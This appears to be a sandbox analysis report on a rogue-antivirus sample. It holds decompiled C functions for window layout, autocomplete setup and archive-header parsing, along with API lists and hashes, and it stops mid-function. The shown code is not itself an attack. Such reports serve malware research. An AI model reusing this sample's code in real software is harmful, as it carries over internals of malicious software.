                                                                                                                                                      • API String ID: 1160896117-59479332
                                                                                                                                                      • Opcode ID: 0da94162a2e766bdbe82b1bfe66c37a068abecef2229ffbeaeae6bfa85b50b3e
                                                                                                                                                      • Instruction ID: 10db50892544c82e3e987b9d54ba19f99f0ac7ddaf3a66f55f7d51236d57b0a1
                                                                                                                                                      • Opcode Fuzzy Hash: 0da94162a2e766bdbe82b1bfe66c37a068abecef2229ffbeaeae6bfa85b50b3e
                                                                                                                                                      • Instruction Fuzzy Hash: 6251D171845289BEDF21DBA0DC45ADE7B69EF00304F1840BBE540F72D2D73989859B8D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 849 4096e7-40973f call 409610 GetWindowRect GetClientRect 852 409741-409745 849->852 853 409774-409778 849->853 854 4097b4-4097d3 GetSystemMetrics GetWindow 852->854 855 409747-40976e SetWindowPos 852->855 853->854 856 40977a-4097ae GetWindowTextA call 40952c SetWindowTextA 853->856 858 4098aa-4098ac 854->858 855->853 856->854 860 4098b2-4098b6 858->860 861 4097d8-4097df 858->861 861->860 862 4097e5-409801 GetWindowTextA 861->862 863 409803-409822 call 40952c SetWindowTextA 862->863 864 409828-40982c 862->864 863->864 866 409894-4098a5 GetWindow 864->866 867 40982e-40988e GetWindowRect SetWindowPos 864->867 866->860 869 4098a7 866->869 867->866 869->858
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E004096E7(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                                                                                      				char _v5;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				struct HWND__* _v24;
                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                      				struct tagRECT _v56;
                                                                                                                                                      				struct tagRECT _v72;
                                                                                                                                                      				char _v1096;
                                                                                                                                                      				signed int _t96;
                                                                                                                                                      				struct HWND__* _t98;
                                                                                                                                                      				signed int _t116;
                                                                                                                                                      				signed int _t123;
                                                                                                                                                      				signed int _t147;
                                                                                                                                                      				signed int _t150;
                                                                                                                                                      				signed int _t153;
                                                                                                                                                      				void* _t163;
                                                                                                                                                      				void* _t167;
                                                                                                                                                      				void* _t168;
                                                                                                                                                      
                                                                                                                                                      				_v20 = __ecx;
                                                                                                                                                      				_v5 = E00409610(__ecx, __eflags, _a8,  &_v16,  &_v12);
                                                                                                                                                      				GetWindowRect(_a4,  &_v40);
                                                                                                                                                      				GetClientRect(_a4,  &_v72);
                                                                                                                                                      				_t96 = _v72.bottom;
                                                                                                                                                      				_t163 = _v40.right - _v72.right - _v40.left + 1;
                                                                                                                                                      				_t167 = _v40.bottom - _t96 - _v40.top + 1;
                                                                                                                                                      				if(_v5 == 0) {
                                                                                                                                                      					L3:
                                                                                                                                                      					if(_a12 == 0) {
                                                                                                                                                      						GetWindowTextA(_a4,  &_v1096, 0x400);
                                                                                                                                                      						E0040952C(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                      						SetWindowTextA(_a4,  &_v1096); // executed
                                                                                                                                                      					}
                                                                                                                                                      					L5:
                                                                                                                                                      					_t168 = _t167 - GetSystemMetrics(8);
                                                                                                                                                      					_t98 = GetWindow(_a4, 5);
                                                                                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                                                                                      					_a12 = _t98;
                                                                                                                                                      					_v24 = _t98;
                                                                                                                                                      					while(_t98 != 0) {
                                                                                                                                                      						__eflags = _a4 - 0x200;
                                                                                                                                                      						if(_a4 >= 0x200) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						GetWindowTextA(_a12,  &_v1096, 0x400); // executed
                                                                                                                                                      						__eflags = _v1096;
                                                                                                                                                      						if(_v1096 != 0) {
                                                                                                                                                      							E0040952C(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                      							SetWindowTextA(_a12,  &_v1096); // executed
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v5;
                                                                                                                                                      						if(_v5 != 0) {
                                                                                                                                                      							GetWindowRect(_a12,  &_v56);
                                                                                                                                                      							_push(0x204);
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_t147 = 0x64;
                                                                                                                                                      							_push((_v56.bottom - _v56.top + 1) * _v12 / _t147);
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_push((_v56.right - _v56.left + 1) * _v16 / _t147);
                                                                                                                                                      							_t116 = (_v56.top - _v40.top - _t168) * _v12;
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_push(_t116 / _t147);
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_t123 = (_v56.left - (_t163 - _t116 % _t147 >> 1) - _v40.left) * _v16;
                                                                                                                                                      							_t150 = 0x64;
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							__eflags = _t123 % _t150;
                                                                                                                                                      							SetWindowPos(_a12, 0, _t123 / _t150, ??, ??, ??, ??);
                                                                                                                                                      						}
                                                                                                                                                      						_t98 = GetWindow(_a12, 2);
                                                                                                                                                      						_a12 = _t98;
                                                                                                                                                      						__eflags = _t98 - _v24;
                                                                                                                                                      						if(_t98 == _v24) {
                                                                                                                                                      							break;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t87 =  &_a4;
                                                                                                                                                      							 *_t87 = _a4 + 1;
                                                                                                                                                      							__eflags =  *_t87;
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t98;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      				_push(0x206);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_t153 = 0x64;
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				SetWindowPos(_a4, 0, 0, 0, _v72.right * _v16 / _t153 + _t163, _t96 * _v12 / _t153 + _t167, ??);
                                                                                                                                                      				goto L3;
                                                                                                                                                      			}






















                                                                                                                                                      0x004096fe
                                                                                                                                                      0x0040970c
                                                                                                                                                      0x00409716
                                                                                                                                                      0x0040971f
                                                                                                                                                      0x0040972e
                                                                                                                                                      0x00409739
                                                                                                                                                      0x0040973a
                                                                                                                                                      0x0040973f
                                                                                                                                                      0x00409774
                                                                                                                                                      0x00409778
                                                                                                                                                      0x00409789
                                                                                                                                                      0x0040979f
                                                                                                                                                      0x004097ae
                                                                                                                                                      0x004097ae
                                                                                                                                                      0x004097b4
                                                                                                                                                      0x004097c1
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c9
                                                                                                                                                      0x004097cd
                                                                                                                                                      0x004097d0
                                                                                                                                                      0x004098aa
                                                                                                                                                      0x004097d8
                                                                                                                                                      0x004097df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097f4
                                                                                                                                                      0x004097fa
                                                                                                                                                      0x00409801
                                                                                                                                                      0x00409813
                                                                                                                                                      0x00409822
                                                                                                                                                      0x00409822
                                                                                                                                                      0x00409828
                                                                                                                                                      0x0040982c
                                                                                                                                                      0x00409835
                                                                                                                                                      0x0040983d
                                                                                                                                                      0x00409847
                                                                                                                                                      0x0040984a
                                                                                                                                                      0x0040984d
                                                                                                                                                      0x00409859
                                                                                                                                                      0x0040985c
                                                                                                                                                      0x00409865
                                                                                                                                                      0x00409869
                                                                                                                                                      0x0040986c
                                                                                                                                                      0x0040986f
                                                                                                                                                      0x00409880
                                                                                                                                                      0x00409884
                                                                                                                                                      0x00409885
                                                                                                                                                      0x00409886
                                                                                                                                                      0x0040988e
                                                                                                                                                      0x0040988e
                                                                                                                                                      0x00409899
                                                                                                                                                      0x0040989f
                                                                                                                                                      0x004098a2
                                                                                                                                                      0x004098a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004098a7
                                                                                                                                                      0x004098a7
                                                                                                                                                      0x004098a7
                                                                                                                                                      0x004098a7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004098a7
                                                                                                                                                      0x004098a5
                                                                                                                                                      0x004098b6
                                                                                                                                                      0x004098b6
                                                                                                                                                      0x00409745
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040974b
                                                                                                                                                      0x00409750
                                                                                                                                                      0x00409753
                                                                                                                                                      0x00409760
                                                                                                                                                      0x0040976e
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32 ref: 00409716
                                                                                                                                                      • GetClientRect.USER32 ref: 0040971F
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000110,?,00000206,?,?,00000000), ref: 0040976E
                                                                                                                                                      • GetWindowTextA.USER32 ref: 00409789
                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 004097AE
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 004097B6
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 004097C3
                                                                                                                                                      • GetWindowTextA.USER32 ref: 004097F4
                                                                                                                                                      • SetWindowTextA.USER32(00000000,00000000), ref: 00409822
                                                                                                                                                      • GetWindowRect.USER32 ref: 00409835
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000110,00000200,00000110,00000200,00000204,?,?,00000000), ref: 0040988E
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00409899
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Text$Rect$ClientMetricsSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3650388129-0
                                                                                                                                                      • Opcode ID: 8347b969ea2e7842fe4e0cd55c718392ddfeeb50cd3035ac2abe21e5bfc3b89a
                                                                                                                                                      • Instruction ID: 2c8379ae239d10ca57cd2180f3cddb418138291bf691b0d013c936aa1406a731
                                                                                                                                                      • Opcode Fuzzy Hash: 8347b969ea2e7842fe4e0cd55c718392ddfeeb50cd3035ac2abe21e5bfc3b89a
                                                                                                                                                      • Instruction Fuzzy Hash: F1512C72900209AFDF05DFA8DD49BEEBBB9EB48300F048066FA14E61A1D7B59E54CB54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 870 40aad5-40aae3 call 406e67 873 40ab76-40ab77 870->873 874 40aae9-40aaf0 870->874 875 40aaf2-40aaf9 874->875 876 40ab2f-40ab42 GetClassNameA 874->876 875->873 877 40aafb-40ab08 GetModuleHandleA 875->877 878 40ab44-40ab57 lstrcmpiA 876->878 879 40ab68-40ab6a 876->879 880 40ab0a-40ab16 GetProcAddress 877->880 881 40ab1b-40ab2d 877->881 882 40ab67 878->882 883 40ab59-40ab65 FindWindowExA 878->883 884 40ab75 879->884 885 40ab6c-40ab6f SHAutoComplete 879->885 880->881 881->873 881->876 882->879 883->882 884->873 885->884
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AAD5(signed int __ecx, void* __eflags, long _a4) {
                                                                                                                                                      				char _v84;
                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                      				long _t8;
                                                                                                                                                      				struct HINSTANCE__* _t10;
                                                                                                                                                      				signed int _t12;
                                                                                                                                                      				long _t15;
                                                                                                                                                      				CHAR* _t18;
                                                                                                                                                      
                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                      				_t6 = E00406E67();
                                                                                                                                                      				if(_t6 >= 5) {
                                                                                                                                                      					if( *0x41f314 != 0) {
                                                                                                                                                      						L6:
                                                                                                                                                      						_t15 = _a4;
                                                                                                                                                      						_t8 = GetClassNameA(_t15,  &_v84, 0x50);
                                                                                                                                                      						if(_t8 != 0) {
                                                                                                                                                      							_t18 = "EDIT";
                                                                                                                                                      							_t8 = lstrcmpiA( &_v84, _t18);
                                                                                                                                                      							if(_t8 != 0) {
                                                                                                                                                      								_t8 = FindWindowExA(_t15, 0, _t18, 0); // executed
                                                                                                                                                      								_t15 = _t8;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_t15 != 0) {
                                                                                                                                                      							_t8 = SHAutoComplete(_t15, 0x10); // executed
                                                                                                                                                      						}
                                                                                                                                                      						return _t8;
                                                                                                                                                      					}
                                                                                                                                                      					if( *0x41f312 == 0) {
                                                                                                                                                      						_t10 = GetModuleHandleA("shlwapi.dll");
                                                                                                                                                      						if(_t10 != 0) {
                                                                                                                                                      							 *0x41f314 = GetProcAddress(_t10, "SHAutoComplete");
                                                                                                                                                      						}
                                                                                                                                                      						_t6 =  *0x41f314;
                                                                                                                                                      						 *0x41f312 = _t12 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                      						if(_t6 != 0) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}










                                                                                                                                                      0x0040aad5
                                                                                                                                                      0x0040aadb
                                                                                                                                                      0x0040aae3
                                                                                                                                                      0x0040aaf0
                                                                                                                                                      0x0040ab2f
                                                                                                                                                      0x0040ab30
                                                                                                                                                      0x0040ab3a
                                                                                                                                                      0x0040ab42
                                                                                                                                                      0x0040ab45
                                                                                                                                                      0x0040ab4f
                                                                                                                                                      0x0040ab57
                                                                                                                                                      0x0040ab5f
                                                                                                                                                      0x0040ab65
                                                                                                                                                      0x0040ab65
                                                                                                                                                      0x0040ab67
                                                                                                                                                      0x0040ab6a
                                                                                                                                                      0x0040ab6f
                                                                                                                                                      0x0040ab6f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ab75
                                                                                                                                                      0x0040aaf9
                                                                                                                                                      0x0040ab00
                                                                                                                                                      0x0040ab08
                                                                                                                                                      0x0040ab16
                                                                                                                                                      0x0040ab16
                                                                                                                                                      0x0040ab1b
                                                                                                                                                      0x0040ab25
                                                                                                                                                      0x0040ab2d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ab2d
                                                                                                                                                      0x0040aaf9
                                                                                                                                                      0x0040ab77

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                      • GetModuleHandleA.KERNEL32(shlwapi.dll), ref: 0040AB00
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB10
                                                                                                                                                      • GetClassNameA.USER32(?,?,00000050), ref: 0040AB3A
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,EDIT,?), ref: 0040AB4F
                                                                                                                                                      • FindWindowExA.USER32(?,00000000,EDIT,00000000), ref: 0040AB5F
                                                                                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 0040AB6F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressAutoClassCompleteFindHandleModuleNameProcVersionWindowlstrcmpi
                                                                                                                                                      • String ID: EDIT$SHAutoComplete$shlwapi.dll
                                                                                                                                                      • API String ID: 1963989359-1514112725
                                                                                                                                                      • Opcode ID: 7e0d619349da05086fca975bc4543e4d59b9c9950fa6a2fddf57d72a482bf5e1
                                                                                                                                                      • Instruction ID: 10eeb78ca3ae2ac3a2d6c46f0613fd210b7585f0e1121851411f370b487ba33d
                                                                                                                                                      • Opcode Fuzzy Hash: 7e0d619349da05086fca975bc4543e4d59b9c9950fa6a2fddf57d72a482bf5e1
                                                                                                                                                      • Instruction Fuzzy Hash: 09118271A013086AD7205B75AD49FEB3ABD9B45740F04803AEA00E22D0DBB8E565C77E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 886 401ca1-401cd4 call 401200 call 404fa3 call 408e85 893 401cd6-401ceb 886->893 894 401d2e-401d32 886->894 893->894 896 401ced 893->896 895 401d9f-401da4 call 408ced 894->895 900 401da9-401dad 895->900 898 401cf9-401d10 call 405651 896->898 899 401cef-401cf7 896->899 903 401d12-401d14 call 401b3c 898->903 905 401d34-401d42 898->905 899->894 899->898 900->903 904 401db3-401dfd call 408d9f call 408d7d call 408d9f * 2 900->904 908 401d19 903->908 931 401e30-401e39 904->931 932 401dff-401e2b call 4098d0 call 40b282 call 40321d 904->932 910 401d44-401d57 call 402c52 905->910 911 401d6f-401d9c call 402d79 905->911 913 401d1d 908->913 910->911 924 401d59-401d6a call 404ef5 call 4033ff 910->924 911->895 917 401d27-401d29 913->917 918 401d1f-401d22 call 40a1de 913->918 922 4024c8-4024cc 917->922 918->917 924->911 934 401e3b-401e3d 931->934 935 401e3f-401e42 931->935 932->908 937 401e50-401e7f call 408ced 934->937 938 401e44-401e47 935->938 939 401e49-401e4f 935->939 945 401e85-401e86 937->945 946 40235d-402396 call 408d9f call 408dde 937->946 938->934 938->939 939->937 947 401f05-401f0e 945->947 948 401e88-401e8b 945->948 960 4023a7-4023cb call 408e5b 946->960 970 402398-4023a2 call 408d7d 946->970 953 401f10 947->953 954 401f16-401fab call 408dde * 2 call 408d7d call 408dde * 2 call 408d7d * 2 call 408d9f call 408dde 947->954 948->947 951 401e8d-401e8e 948->951 956 401e90-401e98 951->956 957 401ebf-401ed7 951->957 953->954 1027 401fc7-401fd9 954->1027 1028 401fad-401fc5 call 408dde * 2 954->1028 956->960 961 401e9e-401eba call 408dde 956->961 962 401ee8-401eeb 957->962 963 401ed9-401ee3 call 408dde 957->963 977 4023d1-4023ed 960->977 978 40247d-402489 960->978 961->960 962->960 969 401ef1-401f00 call 408d9f 962->969 963->962 969->960 970->960 977->978 983 4023f3-4023f6 977->983 980 4024b6-4024bc 978->980 981 40248b 978->981 989 4024c6 980->989 990 4024be-4024c1 call 40a1de 980->990 984 40249b-4024b4 call 4098d0 call 40b282 981->984 985 40248d-402499 981->985 987 402446-40245d call 4098d0 call 40b282 call 404ef5 983->987 988 4023f8-4023ff 983->988 1008 402462-402478 call 40321d 984->1008 985->980 985->984 987->1008 988->987 994 402401-402422 call 40a7c2 call 404fa3 call 4054b4 988->994 989->922 990->989 1019 402426-40242f call 405716 994->1019 1008->913 1025 402431 1019->1025 1026 402435-402436 1019->1026 1025->1026 1026->1019 1029 402438-402444 call 40a7e9 1026->1029 1032 401fe4-40203b call 401030 * 2 1027->1032 1033 401fdb-401fe2 1027->1033 1028->1032 1029->978 1029->987 1042 402040-402076 call 408e23 call 40dbc0 1032->1042 1043 40203d 1032->1043 1033->1032 1048 402103-402106 1042->1048 1049 40207c-402094 1042->1049 1043->1042 1050 40210c-402115 1048->1050 1051 4021ae-4021b7 1048->1051 1052 402096 1049->1052 1053 402099-40209b 1049->1053 1054 40211b-40213d call 403097 call 40a35d 1050->1054 1055 40219e-4021a0 1050->1055 1056 4021b9-4021c5 call 408e23 1051->1056 1057 4021ca-4021f7 call 40dfcd 1051->1057 1052->1053 1053->1051 1058 4020a1-4020cb call 4016c4 call 408e23 call 40a4c2 1053->1058 1076 40216c-402188 call 4030a8 1054->1076 1077 40213f-40216a call 40e2af call 40e1e9 CharToOemA 1054->1077 1059 4021a7-4021a9 call 401bfe 1055->1059 1056->1057 1069 4022d5-40230f call 408e5b 1057->1069 1070 4021fd-402230 call 408d9f 1057->1070 1058->1051 1090 4020d1-4020fe 1058->1090 1059->1051 1069->960 1085 402315-40231c 1069->1085 1082 402237-40224c 1070->1082 1089 40218d-402191 1076->1089 1077->1089 1087 4022c4-4022cf 1082->1087 1088 40224e-402252 1082->1088 1091 40232b-40235b call 40321d call 40dc38 call 4098d0 call 40b282 1085->1091 1092 40231e-402326 call 40a5bb 1085->1092 1087->1069 1087->1082 1096 402254-40226a call 408dde call 40dfcd 1088->1096 1097 40226d-40227e 1088->1097 1089->1059 1098 402193-40219c 1089->1098 1090->1051 1091->960 1092->1091 1096->1097 1100 402280 1097->1100 1101 402283-40228c 1097->1101 1098->1059 1100->1101 1105 4022b2-4022c1 1101->1105 1106 40228e-402293 1101->1106 1105->1087 1110 402295-4022b0 call 408d7d 1106->1110 1110->1105
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E00401CA1(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                      				char _v5;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				CHAR* _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				intOrPtr* _v24;
                                                                                                                                                      				signed char _v25;
                                                                                                                                                      				signed char _v26;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				signed int _v56;
                                                                                                                                                      				char _v60;
                                                                                                                                                      				signed short _v64;
                                                                                                                                                      				signed char _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				char _v88;
                                                                                                                                                      				char _v92;
                                                                                                                                                      				signed int _v104;
                                                                                                                                                      				char _v108;
                                                                                                                                                      				void _v128;
                                                                                                                                                      				char _v4224;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t269;
                                                                                                                                                      				signed int _t282;
                                                                                                                                                      				signed int _t284;
                                                                                                                                                      				signed int _t288;
                                                                                                                                                      				signed int _t294;
                                                                                                                                                      				signed int _t295;
                                                                                                                                                      				void* _t308;
                                                                                                                                                      				signed int _t309;
                                                                                                                                                      				signed int _t311;
                                                                                                                                                      				intOrPtr* _t315;
                                                                                                                                                      				signed int* _t335;
                                                                                                                                                      				signed short _t342;
                                                                                                                                                      				intOrPtr _t347;
                                                                                                                                                      				signed int _t358;
                                                                                                                                                      				intOrPtr _t359;
                                                                                                                                                      				void* _t361;
                                                                                                                                                      				signed char _t374;
                                                                                                                                                      				signed int _t375;
                                                                                                                                                      				signed int _t376;
                                                                                                                                                      				signed int _t382;
                                                                                                                                                      				void* _t394;
                                                                                                                                                      				signed int _t409;
                                                                                                                                                      				void* _t429;
                                                                                                                                                      				signed int _t432;
                                                                                                                                                      				void* _t440;
                                                                                                                                                      				signed short _t449;
                                                                                                                                                      				signed int _t452;
                                                                                                                                                      				signed int _t456;
                                                                                                                                                      				signed int _t465;
                                                                                                                                                      				signed int* _t475;
                                                                                                                                                      				signed int _t488;
                                                                                                                                                      				signed int _t490;
                                                                                                                                                      				signed int _t500;
                                                                                                                                                      				signed int _t514;
                                                                                                                                                      				signed int _t526;
                                                                                                                                                      				void* _t529;
                                                                                                                                                      				signed char* _t533;
                                                                                                                                                      				signed int* _t537;
                                                                                                                                                      				signed int _t539;
                                                                                                                                                      				void* _t541;
                                                                                                                                                      				signed int _t548;
                                                                                                                                                      				short* _t549;
                                                                                                                                                      				signed int _t552;
                                                                                                                                                      				signed short* _t555;
                                                                                                                                                      				signed int _t557;
                                                                                                                                                      				signed int _t559;
                                                                                                                                                      				intOrPtr* _t561;
                                                                                                                                                      				signed int _t563;
                                                                                                                                                      				signed int _t566;
                                                                                                                                                      				signed char* _t568;
                                                                                                                                                      				intOrPtr _t569;
                                                                                                                                                      				void* _t570;
                                                                                                                                                      				void* _t571;
                                                                                                                                                      				void* _t574;
                                                                                                                                                      				signed int _t578;
                                                                                                                                                      				signed int _t581;
                                                                                                                                                      
                                                                                                                                                      				_t526 = __edx;
                                                                                                                                                      				E00401200(0x107c);
                                                                                                                                                      				_t440 = __ecx; // executed
                                                                                                                                                      				_t269 = E00404FA3(__ecx, __edx); // executed
                                                                                                                                                      				 *((intOrPtr*)(__ecx + 0x6d78)) = _t269;
                                                                                                                                                      				 *(__ecx + 0x6d7c) = __edx;
                                                                                                                                                      				E00408E85( &_v56, __ecx);
                                                                                                                                                      				if( *((char*)(__ecx + 0x6d90)) == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_v5 = 0;
                                                                                                                                                      					L15:
                                                                                                                                                      					E00408CED(_t440,  &_v56, 7); // executed
                                                                                                                                                      					__eflags = _v40;
                                                                                                                                                      					if(_v40 == 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						E00401B3C(_t440, _t526);
                                                                                                                                                      						L6:
                                                                                                                                                      						_t581 = _v56;
                                                                                                                                                      						L7:
                                                                                                                                                      						if(_t581 != 0) {
                                                                                                                                                      							E0040A1DE(_v56);
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					E00408D9F( &_v56, _t440 + 0x4680);
                                                                                                                                                      					E00408D7D( &_v56,  &_v26);
                                                                                                                                                      					_t533 = _t440 + 0x4688;
                                                                                                                                                      					 *(_t440 + 0x4684) = _v26 & 0x000000ff;
                                                                                                                                                      					E00408D9F( &_v56, _t533);
                                                                                                                                                      					_t555 = _t440 + 0x468a;
                                                                                                                                                      					E00408D9F( &_v56, _t555);
                                                                                                                                                      					_t449 =  *_t555 & 0x0000ffff;
                                                                                                                                                      					__eflags = _t449 - 7;
                                                                                                                                                      					if(_t449 >= 7) {
                                                                                                                                                      						_t282 =  *(_t440 + 0x4684);
                                                                                                                                                      						__eflags = _t282 - 0x75;
                                                                                                                                                      						if(_t282 != 0x75) {
                                                                                                                                                      							__eflags = _t282 - 0x73;
                                                                                                                                                      							if(_t282 != 0x73) {
                                                                                                                                                      								L22:
                                                                                                                                                      								_t284 = (_t449 & 0x0000ffff) - 7;
                                                                                                                                                      								__eflags = _t284;
                                                                                                                                                      								_push(_t284);
                                                                                                                                                      								L23:
                                                                                                                                                      								E00408CED(_t440,  &_v56);
                                                                                                                                                      								asm("cdq");
                                                                                                                                                      								asm("adc edx, [ebx+0x6d7c]");
                                                                                                                                                      								 *((intOrPtr*)(_t440 + 0x6d80)) = ( *_t555 & 0x0000ffff) +  *((intOrPtr*)(_t440 + 0x6d78));
                                                                                                                                                      								_t288 =  *(_t440 + 0x4684);
                                                                                                                                                      								_t452 = _t288 - 0x73;
                                                                                                                                                      								__eflags = _t452;
                                                                                                                                                      								 *(_t440 + 0x6d84) = _t526;
                                                                                                                                                      								if(_t452 == 0) {
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									asm("movsd");
                                                                                                                                                      									E00408D9F( &_v56, _t440 + 0x4698);
                                                                                                                                                      									E00408DDE( &_v56, _t440 + 0x469c);
                                                                                                                                                      									__eflags =  *(_t440 + 0x4694) & 0x00000200;
                                                                                                                                                      									if(( *(_t440 + 0x4694) & 0x00000200) != 0) {
                                                                                                                                                      										E00408D7D( &_v56, _t440 + 0x46a0);
                                                                                                                                                      									}
                                                                                                                                                      									L76:
                                                                                                                                                      									_t294 = E00408E5B( &_v56, 0);
                                                                                                                                                      									__eflags = _v5;
                                                                                                                                                      									_t456 =  *(_t440 + 0x4684);
                                                                                                                                                      									_t295 =  !_t294;
                                                                                                                                                      									 *(_t440 + 0x6d9a) = _t295;
                                                                                                                                                      									 *(_t440 + 0x4678) = _t456;
                                                                                                                                                      									if(_v5 == 0) {
                                                                                                                                                      										L87:
                                                                                                                                                      										__eflags =  *(_t440 + 0x6d84) -  *((intOrPtr*)(_t440 + 0x6d7c));
                                                                                                                                                      										if(__eflags > 0) {
                                                                                                                                                      											L91:
                                                                                                                                                      											_t557 = _v40;
                                                                                                                                                      											__eflags = _v56;
                                                                                                                                                      											if(_v56 != 0) {
                                                                                                                                                      												E0040A1DE(_v56);
                                                                                                                                                      											}
                                                                                                                                                      											return _t557;
                                                                                                                                                      										}
                                                                                                                                                      										if(__eflags < 0) {
                                                                                                                                                      											L90:
